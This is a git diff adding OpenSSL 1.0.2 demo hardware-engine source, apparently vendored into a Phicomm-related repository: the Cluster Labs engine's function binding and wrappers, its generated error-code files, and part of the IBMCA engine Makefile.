+    if (cluster_labs_dso != NULL) {
+        CLerr(CL_F_CLUSTER_LABS_INIT, CL_R_ALREADY_LOADED);
+        goto err;
+    }
+    /* try to load engine    */
+    cluster_labs_dso = DSO_load(NULL, CLUSTER_LABS_LIB_NAME, NULL, 0);
+    if (cluster_labs_dso == NULL) {
+        CLerr(CL_F_CLUSTER_LABS_INIT, CL_R_DSO_FAILURE);
+        goto err;
+    }
+    /* bind functions */
+    if (!
+        (p1 =
+         (cl_engine_init *) DSO_bind_func(cluster_labs_dso, CLUSTER_LABS_F1))
+|| !(p2 = (cl_mod_exp *) DSO_bind_func(cluster_labs_dso, CLUSTER_LABS_F2))
+|| !(p3 = (cl_mod_exp_crt *) DSO_bind_func(cluster_labs_dso, CLUSTER_LABS_F3))
+|| !(p4 = (cl_rsa_mod_exp *) DSO_bind_func(cluster_labs_dso, CLUSTER_LABS_F4))
+|| !(p5 =
+     (cl_rsa_priv_enc *) DSO_bind_func(cluster_labs_dso, CLUSTER_LABS_F5))
+|| !(p6 =
+     (cl_rsa_priv_dec *) DSO_bind_func(cluster_labs_dso, CLUSTER_LABS_F6))
+|| !(p7 = (cl_rsa_pub_enc *) DSO_bind_func(cluster_labs_dso, CLUSTER_LABS_F7))
+|| !(p8 = (cl_rsa_pub_dec *) DSO_bind_func(cluster_labs_dso, CLUSTER_LABS_F8))
+|| !(p20 =
+     (cl_rand_bytes *) DSO_bind_func(cluster_labs_dso, CLUSTER_LABS_F20))
+|| !(p30 = (cl_dsa_sign *) DSO_bind_func(cluster_labs_dso, CLUSTER_LABS_F30))
+|| !(p31 =
+     (cl_dsa_verify *) DSO_bind_func(cluster_labs_dso, CLUSTER_LABS_F31))) {
+        CLerr(CL_F_CLUSTER_LABS_INIT, CL_R_DSO_FAILURE);
+        goto err;
+    }
+
+    /* copy function pointers */
+    p_cl_engine_init = p1;
+    p_cl_mod_exp = p2;
+    p_cl_mod_exp_crt = p3;
+    p_cl_rsa_mod_exp = p4;
+    p_cl_rsa_priv_enc = p5;
+    p_cl_rsa_priv_dec = p6;
+    p_cl_rsa_pub_enc = p7;
+    p_cl_rsa_pub_dec = p8;
+    p_cl_rand_bytes = p20;
+    p_cl_dsa_sign = p30;
+    p_cl_dsa_verify = p31;
+
+    /* cluster labs engine init */
+    if (p_cl_engine_init() == 0) {
+        CLerr(CL_F_CLUSTER_LABS_INIT, CL_R_INIT_FAILED);
+        goto err;
+    }
+
+    return (1);
+
+ err:
+    /* reset all pointers */
+    if (cluster_labs_dso)
+        DSO_free(cluster_labs_dso);
+
+    cluster_labs_dso = NULL;
+    p_cl_engine_init = NULL;
+    p_cl_mod_exp = NULL;
+    p_cl_mod_exp_crt = NULL;
+    p_cl_rsa_mod_exp = NULL;
+    p_cl_rsa_priv_enc = NULL;
+    p_cl_rsa_priv_dec = NULL;
+    p_cl_rsa_pub_enc = NULL;
+    p_cl_rsa_pub_dec = NULL;
+    p_cl_rand_bytes = NULL;
+    p_cl_dsa_sign = NULL;
+    p_cl_dsa_verify = NULL;
+
+    return (0);
+}
+
+static int cluster_labs_finish(ENGINE *e)
+{
+
+    if (cluster_labs_dso == NULL) {
+        CLerr(CL_F_CLUSTER_LABS_FINISH, CL_R_NOT_LOADED);
+        return 0;
+    }
+    if (!DSO_free(cluster_labs_dso)) {
+        CLerr(CL_F_CLUSTER_LABS_FINISH, CL_R_DSO_FAILURE);
+        return 0;
+    }
+
+    cluster_labs_dso = NULL;
+    p_cl_engine_init = NULL;
+    p_cl_mod_exp = NULL;
+    p_cl_rsa_mod_exp = NULL;
+    p_cl_mod_exp_crt = NULL;
+    p_cl_rsa_priv_enc = NULL;
+    p_cl_rsa_priv_dec = NULL;
+    p_cl_rsa_pub_enc = NULL;
+    p_cl_rsa_pub_dec = NULL;
+    p_cl_rand_bytes = NULL;
+    p_cl_dsa_sign = NULL;
+    p_cl_dsa_verify = NULL;
+
+    return (1);
+
+}
+
+static int cluster_labs_ctrl(ENGINE *e, int cmd, long i, void *p,
+                             void (*f) ())
+{
+    int initialised = ((cluster_labs_dso == NULL) ? 0 : 1);
+
+    switch (cmd) {
+    case CLUSTER_LABS_CMD_SO_PATH:
+        if (p == NULL) {
+            CLerr(CL_F_CLUSTER_LABS_CTRL, ERR_R_PASSED_NULL_PARAMETER);
+            return 0;
+        }
+        if (initialised) {
+            CLerr(CL_F_CLUSTER_LABS_CTRL, CL_R_ALREADY_LOADED);
+            return 0;
+        }
+        CLUSTER_LABS_LIB_NAME = (const char *)p;
+        return 1;
+    default:
+        break;
+    }
+    CLerr(CL_F_CLUSTER_LABS_CTRL, CL_R_COMMAND_NOT_IMPLEMENTED);
+    return 0;
+}
+
+static int cluster_labs_mod_exp(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
+                                const BIGNUM *m, BN_CTX *ctx)
+{
+
+    if (cluster_labs_dso == NULL) {
+        CLerr(CL_F_CLUSTER_LABS_MOD_EXP, CL_R_NOT_LOADED);
+        return 0;
+    }
+    if (p_cl_mod_exp == NULL) {
+        CLerr(CL_F_CLUSTER_LABS_MOD_EXP, CL_R_FUNCTION_NOT_BINDED);
+        return 0;
+    }
+
+    return p_cl_mod_exp(r, a, p, m, ctx);
+
+}
+
+static int cluster_labs_mod_exp_crt(BIGNUM *r, BIGNUM *a, const BIGNUM *p,
+                                    const BIGNUM *q, const BIGNUM *dmp1,
+                                    const BIGNUM *dmq1, const BIGNUM *iqmp,
+                                    BN_CTX *ctx)
+{
+
+    if (cluster_labs_dso == NULL) {
+        CLerr(CL_F_CLUSTER_LABS_MOD_EXP_CRT, CL_R_NOT_LOADED);
+        return 0;
+    }
+    if (p_cl_mod_exp_crt == NULL) {
+        CLerr(CL_F_CLUSTER_LABS_MOD_EXP_CRT, CL_R_FUNCTION_NOT_BINDED);
+        return 0;
+    }
+
+    return p_cl_mod_exp_crt(r, a, p, q, dmp1, dmq1, iqmp, ctx);
+
+}
+
+static int cluster_labs_rsa_mod_exp(BIGNUM *r0, const BIGNUM *I, RSA *rsa)
+{
+
+    if (cluster_labs_dso == NULL) {
+        CLerr(CL_F_CLUSTER_LABS_RSA_MOD_EXP, CL_R_NOT_LOADED);
+        return 0;
+    }
+    if (p_cl_rsa_mod_exp == NULL) {
+        CLerr(CL_F_CLUSTER_LABS_RSA_MOD_EXP, CL_R_FUNCTION_NOT_BINDED);
+        return 0;
+    }
+
+    return p_cl_rsa_mod_exp(r0, I, rsa);
+
+}
+
+static DSA_SIG *cluster_labs_dsa_sign(const unsigned char *dgst, int dlen,
+                                      DSA *dsa)
+{
+
+    if (cluster_labs_dso == NULL) {
+        CLerr(CL_F_CLUSTER_LABS_DSA_SIGN, CL_R_NOT_LOADED);
+        return 0;
+    }
+    if (p_cl_dsa_sign == NULL) {
+        CLerr(CL_F_CLUSTER_LABS_DSA_SIGN, CL_R_FUNCTION_NOT_BINDED);
+        return 0;
+    }
+
+    return p_cl_dsa_sign(dgst, dlen, dsa);
+
+}
+
+static int cluster_labs_dsa_verify(const unsigned char *dgst, int dgst_len,
+                                   DSA_SIG *sig, DSA *dsa)
+{
+
+    if (cluster_labs_dso == NULL) {
+        CLerr(CL_F_CLUSTER_LABS_DSA_VERIFY, CL_R_NOT_LOADED);
+        return 0;
+    }
+
+    if (p_cl_dsa_verify == NULL) {
+        CLerr(CL_F_CLUSTER_LABS_DSA_VERIFY, CL_R_FUNCTION_NOT_BINDED);
+        return 0;
+    }
+
+    return p_cl_dsa_verify(dgst, dgst_len, sig, dsa);
+
+}
+
+static int cluster_labs_dsa_mod_exp(DSA *dsa, BIGNUM *rr, BIGNUM *a1,
+                                    BIGNUM *p1, BIGNUM *a2, BIGNUM *p2,
+                                    BIGNUM *m, BN_CTX *ctx,
+                                    BN_MONT_CTX *in_mont)
+{
+    BIGNUM t;
+    int status = 0;
+
+    BN_init(&t);
+    /* let rr = a1 ^ p1 mod m */
+    if (!cluster_labs_mod_exp(rr, a1, p1, m, ctx))
+        goto end;
+    /* let t = a2 ^ p2 mod m */
+    if (!cluster_labs_mod_exp(&t, a2, p2, m, ctx))
+        goto end;
+    /* let rr = rr * t mod m */
+    if (!BN_mod_mul(rr, rr, &t, m, ctx))
+        goto end;
+    status = 1;
+ end:
+    BN_free(&t);
+
+    return (1);
+
+}
+
+static int cluster_labs_mod_exp_dsa(DSA *dsa, BIGNUM *r, BIGNUM *a,
+                                    const BIGNUM *p, const BIGNUM *m,
+                                    BN_CTX *ctx, BN_MONT_CTX *m_ctx)
+{
+    return cluster_labs_mod_exp(r, a, p, m, ctx);
+}
+
+/* This function is aliased to mod_exp (with the mont stuff dropped). */
+static int cluster_labs_mod_exp_mont(BIGNUM *r, const BIGNUM *a,
+                                     const BIGNUM *p, const BIGNUM *m,
+                                     BN_CTX *ctx, BN_MONT_CTX *m_ctx)
+{
+    return cluster_labs_mod_exp(r, a, p, m, ctx);
+}
+
+/* This function is aliased to mod_exp (with the dh and mont dropped). */
+static int cluster_labs_mod_exp_dh(const DH *dh, BIGNUM *r, const BIGNUM *a,
+                                   const BIGNUM *p, const BIGNUM *m,
+                                   BN_CTX *ctx, BN_MONT_CTX *m_ctx)
+{
+    return cluster_labs_mod_exp(r, a, p, m, ctx);
+}
+
+static int cluster_labs_rsa_pub_enc(int flen, const unsigned char *from,
+                                    unsigned char *to, RSA *rsa, int padding)
+{
+
+    if (cluster_labs_dso == NULL) {
+        CLerr(CL_F_CLUSTER_LABS_RSA_PUB_ENC, CL_R_NOT_LOADED);
+        return 0;
+    }
+    if (p_cl_rsa_priv_enc == NULL) {
+        CLerr(CL_F_CLUSTER_LABS_RSA_PUB_ENC, CL_R_FUNCTION_NOT_BINDED);
+        return 0;
+    }
+
+    return p_cl_rsa_pub_enc(flen, from, to, rsa, padding);
+
+}
+
+static int cluster_labs_rsa_pub_dec(int flen, const unsigned char *from,
+                                    unsigned char *to, RSA *rsa, int padding)
+{
+
+    if (cluster_labs_dso == NULL) {
+        CLerr(CL_F_CLUSTER_LABS_RSA_PUB_DEC, CL_R_NOT_LOADED);
+        return 0;
+    }
+    if (p_cl_rsa_priv_enc == NULL) {
+        CLerr(CL_F_CLUSTER_LABS_RSA_PUB_DEC, CL_R_FUNCTION_NOT_BINDED);
+        return 0;
+    }
+
+    return p_cl_rsa_pub_dec(flen, from, to, rsa, padding);
+
+}
+
+static int cluster_labs_rsa_priv_enc(int flen, const unsigned char *from,
+                                     unsigned char *to, RSA *rsa, int padding)
+{
+
+    if (cluster_labs_dso == NULL) {
+        CLerr(CL_F_CLUSTER_LABS_RSA_PRIV_ENC, CL_R_NOT_LOADED);
+        return 0;
+    }
+
+    if (p_cl_rsa_priv_enc == NULL) {
+        CLerr(CL_F_CLUSTER_LABS_RSA_PRIV_ENC, CL_R_FUNCTION_NOT_BINDED);
+        return 0;
+    }
+
+    return p_cl_rsa_priv_enc(flen, from, to, rsa, padding);
+
+}
+
+static int cluster_labs_rsa_priv_dec(int flen, const unsigned char *from,
+                                     unsigned char *to, RSA *rsa, int padding)
+{
+
+    if (cluster_labs_dso == NULL) {
+        CLerr(CL_F_CLUSTER_LABS_RSA_PRIV_DEC, CL_R_NOT_LOADED);
+        return 0;
+    }
+    if (p_cl_rsa_priv_dec == NULL) {
+        CLerr(CL_F_CLUSTER_LABS_RSA_PRIV_DEC, CL_R_FUNCTION_NOT_BINDED);
+        return 0;
+    }
+
+    return p_cl_rsa_priv_dec(flen, from, to, rsa, padding);
+
+}
+
+/************************************************************************************
+* Symmetric algorithms
+************************************************************************************/
+/* this will be come soon! */
+
+/************************************************************************************
+* Random generator
+************************************************************************************/
+
+static int cluster_labs_rand_bytes(unsigned char *buf, int num)
+{
+
+    if (cluster_labs_dso == NULL) {
+        CLerr(CL_F_CLUSTER_LABS_RAND_BYTES, CL_R_NOT_LOADED);
+        return 0;
+    }
+    if (p_cl_mod_exp_crt == NULL) {
+        CLerr(CL_F_CLUSTER_LABS_RAND_BYTES, CL_R_FUNCTION_NOT_BINDED);
+        return 0;
+    }
+
+    return p_cl_rand_bytes(buf, num);
+
+}
+
+/*
+ * This stuff is needed if this ENGINE is being compiled into a
+ * self-contained shared-library.
+ */
+#  ifdef ENGINE_DYNAMIC_SUPPORT
+static int bind_fn(ENGINE *e, const char *id)
+{
+    fprintf(stderr, "bind_fn CLUSTER_LABS\n");
+    if (id && (strcmp(id, engine_cluster_labs_id) != 0)) {
+        fprintf(stderr, "bind_fn return(0) first\n");
+        return 0;
+    }
+    if (!bind_helper(e)) {
+        fprintf(stderr, "bind_fn return(1) first\n");
+        return 0;
+    }
+    fprintf(stderr, "bind_fn return(1)\n");
+    return 1;
+}
+
+IMPLEMENT_DYNAMIC_CHECK_FN()
+    IMPLEMENT_DYNAMIC_BIND_FN(bind_fn)
+#  endif                        /* ENGINE_DYNAMIC_SUPPORT */
+# endif                         /* !NO_HW_CLUSTER_LABS */
+#endif                          /* !NO_HW */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/cluster_labs/hw_cluster_labs.ec b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/cluster_labs/hw_cluster_labs.ec
new file mode 100644
index 0000000..1f64786
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/cluster_labs/hw_cluster_labs.ec
@@ -0,0 +1,8 @@
+# configuration file for util/mkerr.pl
+#
+# use like this:
+#
+#	perl ../../../util/mkerr.pl -conf hw_cluster_labs.ec \
+#		-nostatic -staticloader -write *.c
+
+L CL		hw_cluster_labs_err.h		hw_cluster_labs_err.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/cluster_labs/hw_cluster_labs_err.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/cluster_labs/hw_cluster_labs_err.c
new file mode 100644
index 0000000..9e83325
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/cluster_labs/hw_cluster_labs_err.c
@@ -0,0 +1,152 @@
+/* hw_cluster_labs_err.c */
+/* ====================================================================
+ * Copyright (c) 1999-2002 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*
+ * NOTE: this file was auto generated by the mkerr.pl script: any changes
+ * made to it will be overwritten when the script next updates this file,
+ * only reason strings will be preserved.
+ */
+
+#include <stdio.h>
+#include <openssl/err.h>
+#include "hw_cluster_labs_err.h"
+
+/* BEGIN ERROR CODES */
+#ifndef OPENSSL_NO_ERR
+static ERR_STRING_DATA CL_str_functs[] = {
+    {ERR_PACK(0, CL_F_CLUSTER_LABS_CTRL, 0), "CLUSTER_LABS_CTRL"},
+    {ERR_PACK(0, CL_F_CLUSTER_LABS_DSA_SIGN, 0), "CLUSTER_LABS_DSA_SIGN"},
+    {ERR_PACK(0, CL_F_CLUSTER_LABS_DSA_VERIFY, 0), "CLUSTER_LABS_DSA_VERIFY"},
+    {ERR_PACK(0, CL_F_CLUSTER_LABS_FINISH, 0), "CLUSTER_LABS_FINISH"},
+    {ERR_PACK(0, CL_F_CLUSTER_LABS_INIT, 0), "CLUSTER_LABS_INIT"},
+    {ERR_PACK(0, CL_F_CLUSTER_LABS_MOD_EXP, 0), "CLUSTER_LABS_MOD_EXP"},
+    {ERR_PACK(0, CL_F_CLUSTER_LABS_MOD_EXP_CRT, 0),
+     "CLUSTER_LABS_MOD_EXP_CRT"},
+    {ERR_PACK(0, CL_F_CLUSTER_LABS_RAND_BYTES, 0), "CLUSTER_LABS_RAND_BYTES"},
+    {ERR_PACK(0, CL_F_CLUSTER_LABS_RSA_MOD_EXP, 0),
+     "CLUSTER_LABS_RSA_MOD_EXP"},
+    {ERR_PACK(0, CL_F_CLUSTER_LABS_RSA_PRIV_DEC, 0),
+     "CLUSTER_LABS_RSA_PRIV_DEC"},
+    {ERR_PACK(0, CL_F_CLUSTER_LABS_RSA_PRIV_ENC, 0),
+     "CLUSTER_LABS_RSA_PRIV_ENC"},
+    {ERR_PACK(0, CL_F_CLUSTER_LABS_RSA_PUB_DEC, 0),
+     "CLUSTER_LABS_RSA_PUB_DEC"},
+    {ERR_PACK(0, CL_F_CLUSTER_LABS_RSA_PUB_ENC, 0),
+     "CLUSTER_LABS_RSA_PUB_ENC"},
+    {0, NULL}
+};
+
+static ERR_STRING_DATA CL_str_reasons[] = {
+    {CL_R_ALREADY_LOADED, "already loaded"},
+    {CL_R_COMMAND_NOT_IMPLEMENTED, "command not implemented"},
+    {CL_R_DSO_FAILURE, "dso failure"},
+    {CL_R_FUNCTION_NOT_BINDED, "function not binded"},
+    {CL_R_INIT_FAILED, "init failed"},
+    {CL_R_NOT_LOADED, "not loaded"},
+    {0, NULL}
+};
+
+#endif
+
+#ifdef CL_LIB_NAME
+static ERR_STRING_DATA CL_lib_name[] = {
+    {0, CL_LIB_NAME},
+    {0, NULL}
+};
+#endif
+
+static int CL_lib_error_code = 0;
+static int CL_error_init = 1;
+
+static void ERR_load_CL_strings(void)
+{
+    if (CL_lib_error_code == 0)
+        CL_lib_error_code = ERR_get_next_error_library();
+
+    if (CL_error_init) {
+        CL_error_init = 0;
+#ifndef OPENSSL_NO_ERR
+        ERR_load_strings(CL_lib_error_code, CL_str_functs);
+        ERR_load_strings(CL_lib_error_code, CL_str_reasons);
+#endif
+
+#ifdef CL_LIB_NAME
+        CL_lib_name->error = ERR_PACK(CL_lib_error_code, 0, 0);
+        ERR_load_strings(0, CL_lib_name);
+#endif
+    }
+}
+
+static void ERR_unload_CL_strings(void)
+{
+    if (CL_error_init == 0) {
+#ifndef OPENSSL_NO_ERR
+        ERR_unload_strings(CL_lib_error_code, CL_str_functs);
+        ERR_unload_strings(CL_lib_error_code, CL_str_reasons);
+#endif
+
+#ifdef CL_LIB_NAME
+        ERR_unload_strings(0, CL_lib_name);
+#endif
+        CL_error_init = 1;
+    }
+}
+
+static void ERR_CL_error(int function, int reason, char *file, int line)
+{
+    if (CL_lib_error_code == 0)
+        CL_lib_error_code = ERR_get_next_error_library();
+    ERR_PUT_error(CL_lib_error_code, function, reason, file, line);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/cluster_labs/hw_cluster_labs_err.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/cluster_labs/hw_cluster_labs_err.h
new file mode 100644
index 0000000..3300e11
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/cluster_labs/hw_cluster_labs_err.h
@@ -0,0 +1,100 @@
+/* ====================================================================
+ * Copyright (c) 2001-2002 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#ifndef HEADER_CL_ERR_H
+# define HEADER_CL_ERR_H
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+/* BEGIN ERROR CODES */
+/*
+ * The following lines are auto generated by the script mkerr.pl. Any changes
+ * made after this point may be overwritten when the script is next run.
+ */
+static void ERR_load_CL_strings(void);
+static void ERR_unload_CL_strings(void);
+static void ERR_CL_error(int function, int reason, char *file, int line);
+# define CLerr(f,r) ERR_CL_error((f),(r),__FILE__,__LINE__)
+
+/* Error codes for the CL functions. */
+
+/* Function codes. */
+# define CL_F_CLUSTER_LABS_CTRL                           100
+# define CL_F_CLUSTER_LABS_DSA_SIGN                       101
+# define CL_F_CLUSTER_LABS_DSA_VERIFY                     102
+# define CL_F_CLUSTER_LABS_FINISH                         103
+# define CL_F_CLUSTER_LABS_INIT                           104
+# define CL_F_CLUSTER_LABS_MOD_EXP                        105
+# define CL_F_CLUSTER_LABS_MOD_EXP_CRT                    106
+# define CL_F_CLUSTER_LABS_RAND_BYTES                     107
+# define CL_F_CLUSTER_LABS_RSA_MOD_EXP                    108
+# define CL_F_CLUSTER_LABS_RSA_PRIV_DEC                   109
+# define CL_F_CLUSTER_LABS_RSA_PRIV_ENC                   110
+# define CL_F_CLUSTER_LABS_RSA_PUB_DEC                    111
+# define CL_F_CLUSTER_LABS_RSA_PUB_ENC                    112
+
+/* Reason codes. */
+# define CL_R_ALREADY_LOADED                              100
+# define CL_R_COMMAND_NOT_IMPLEMENTED                     101
+# define CL_R_DSO_FAILURE                                 102
+# define CL_R_FUNCTION_NOT_BINDED                         103
+# define CL_R_INIT_FAILED                                 104
+# define CL_R_NOT_LOADED                                  105
+
+#ifdef  __cplusplus
+}
+#endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/ibmca/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/ibmca/Makefile
new file mode 100644
index 0000000..72f3546
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/ibmca/Makefile
@@ -0,0 +1,114 @@
+LIBNAME=	libibmca
+SRC=		hw_ibmca.c
+OBJ=		hw_ibmca.o
+HEADER=		hw_ibmca.h
+
+CC=		gcc
+PIC=		-fPIC
+CFLAGS=		-g -I../../../include $(PIC) -DENGINE_DYNAMIC_SUPPORT -DFLAT_INC
+AR=		ar r
+RANLIB=		ranlib
+
+LIB=		$(LIBNAME).a
+SHLIB=		$(LIBNAME).so
+
+all:
+		@echo 'Please choose a system to build on:'
+		@echo ''
+		@echo 'tru64:    Tru64 Unix, Digital Unix, Digital OSF/1'
+		@echo 'solaris:  Solaris'
+		@echo 'irix:     IRIX'
+		@echo 'hpux32:   32-bit HP/UX'
+		@echo 'hpux64:   64-bit HP/UX'
+		@echo 'aix:      AIX'
+		@echo 'gnu:      Generic GNU-based system (gcc and GNU ld)'
+		@echo ''
+
+FORCE.update:
+update:		FORCE.update
+		perl ../../../util/mkerr.pl -conf hw_ibmca.ec \
+			-nostatic -staticloader -write hw_ibmca.c
+
+gnu:		$(SHLIB).gnu
+tru64:		$(SHLIB).tru64
+solaris:	$(SHLIB).solaris
+irix:		$(SHLIB).irix
+hpux32:		$(SHLIB).hpux32
+hpux64:		$(SHLIB).hpux64
+aix:		$(SHLIB).aix
+
+$(LIB):		$(OBJ)
+		$(AR) $(LIB) $(OBJ)
+		- $(RANLIB) $(LIB)
+
+LINK_SO=	\
+  ld -r -o $(LIBNAME).o $$ALLSYMSFLAGS $(LIB) && \
+  (nm -Pg $(LIBNAME).o | grep ' [BDT] ' | cut -f1 -d' ' > $(LIBNAME).exp; \
+   $$SHAREDCMD $$SHAREDFLAGS -o $(SHLIB) $(LIBNAME).o -L ../../.. -lcrypto -lc)
+
+$(SHLIB).gnu:	$(LIB)
+		ALLSYMSFLAGS='--whole-archive' \
+		SHAREDFLAGS='-shared -Wl,-soname=$(SHLIB)' \
+		SHAREDCMD='$(CC)'; \
+		$(LINK_SO)
+		touch $(SHLIB).gnu
+$(SHLIB).tru64:	$(LIB)
+		ALLSYMSFLAGS='-all' \
+		SHAREDFLAGS='-shared' \
+		SHAREDCMD='$(CC)'; \
+		$(LINK_SO)
+		touch $(SHLIB).tru64
+$(SHLIB).solaris:	$(LIB)
+		ALLSYMSFLAGS='-z allextract' \
+		SHAREDFLAGS='-G -h $(SHLIB)' \
+		SHAREDCMD='$(CC)'; \
+		$(LINK_SO)
+		touch $(SHLIB).solaris
+$(SHLIB).irix:	$(LIB)
+		ALLSYMSFLAGS='-all' \
+		SHAREDFLAGS='-shared -Wl,-soname,$(SHLIB)' \
+		SHAREDCMD='$(CC)'; \
+		$(LINK_SO)
+		touch $(SHLIB).irix
+$(SHLIB).hpux32:	$(LIB)
+		ALLSYMSFLAGS='-Fl' \
+		SHAREDFLAGS='+vnocompatwarnings -b -z +s +h $(SHLIB)' \
+		SHAREDCMD='/usr/ccs/bin/ld'; \
+		$(LINK_SO)
+		touch $(SHLIB).hpux32
+$(SHLIB).hpux64:	$(LIB)
+		ALLSYMSFLAGS='+forceload' \
+		SHAREDFLAGS='-b -z +h $(SHLIB)' \
+		SHAREDCMD='/usr/ccs/bin/ld'; \
+		$(LINK_SO)
+		touch $(SHLIB).hpux64
+$(SHLIB).aix:	$(LIB)
+		ALLSYMSFLAGS='-bnogc' \
+		SHAREDFLAGS='-G -bE:$(LIBNAME).exp -bM:SRE' \
+		SHAREDCMD='$(CC)'; \
+		$(LINK_SO)
+		touch $(SHLIB).aix
+
+depend:
+		sed -e '/^# DO NOT DELETE.*/,$$d' < Makefile > Makefile.tmp
+		echo '# DO NOT DELETE THIS LINE -- make depend depends on it.' >> Makefile.tmp
+		gcc -M $(CFLAGS) $(SRC) >> Makefile.tmp
+		perl ../../../util/clean-depend.pl < Makefile.tmp > Makefile.new
+		rm -f Makefile.tmp Makefile
+		mv Makefile.new Makefile
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+rsaref.o: ../../../include/openssl/asn1.h ../../../include/openssl/bio.h
+rsaref.o: ../../../include/openssl/bn.h ../../../include/openssl/crypto.h
+rsaref.o: ../../../include/openssl/dh.h ../../../include/openssl/dsa.h
